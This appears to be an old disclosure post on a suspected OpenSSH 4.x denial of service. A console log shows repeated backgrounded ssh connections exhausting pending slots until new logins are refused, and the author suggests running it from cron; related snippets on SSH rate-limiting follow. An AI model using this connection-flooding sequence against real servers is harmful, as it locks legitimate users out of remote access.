OpenSSH 4.X DoS (maybe...)

OpenSSH 4.X deny remote connections.

The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.

To reproduce:

telnet 22


Connected to

Escape character is '^]'.

SSH-2.0-OpenSSH_4.7p1 Debian-2

Protocol mismatch.

Connection closed by foreign host.

darkstar# ssh

The authenticity of host ' (' can't be established.

RSA key fingerprint is f9:10:92:7d:8b:70:cb:fe:1c:40:13:7b:6c:e7:d0:bf.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '' (RSA) to the list of known hosts.

root@xxxxxxxx's password:

darkstar# ssh

darkstar# ssh &

[1] 12945

darkstar# ssh &

[2] 12946

darkstar# ssh &

[3] 12947

darkstar# ssh &

[4] 12948

darkstar# ssh &

[5] 12949

darkstar# ssh &

[6] 12950

darkstar# ssh &

[7] 12951

darkstar# ssh &

[8] 12952

darkstar# ssh &

[9] 12953

darkstar# ssh &

[10] 12954

darkstar# ssh &

[11] 12955


ssh_exchange_identification: Connection closed by remote host

An attacker could cronjob a script to force this condition to remain true.

This will deny anyone else from connecting to the service. Normal behaviour?

Shouts: burnout,spithash princess^pookie, #codemasters

Relevant Pages

  • SSH Limiting -- Re: Screensaver takes too much time to fade-out...
    ... I did a little digging through my various notes and found the following for limiting SSH connections: ... limits each host to 3 connections within 5 minutes. ... But when you 'hand edit' iptables, the firewall gui gets 'upset' Also you would need similar rules for ip6tables. ...
  • Re: Alternatives for port forwarding
    ... to exceed what SSH can accomplish. ... If one user is having host A log in with a remote forward listening on ... port 10000, with the intent of logging in from host B with a local forward ... or any connections to a port on the server. ...
  • Re: Re: Reality check: IPFW sees SSH traffic that sshd does not?
    ... connections with that host. ... keyword just the ssh connection causing the rule overload is being ... even the ligitimate hosts are getting blocked. ...
  • Re: restrict connection to specific host or hosts
    ... > Would it be possible to restrict connection to specific host or hosts. ... then they would be able to telnet or SSH to any host they ... If you're really concerned about the network connections your ...
  • Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --
    ... reduction of brute force login attempts via SSH through iptables --hashlimit ... out why my first attempts at using the hashlimit functionality in iptables ... against legitimate SSH connections, unless someone spoofs a very large ...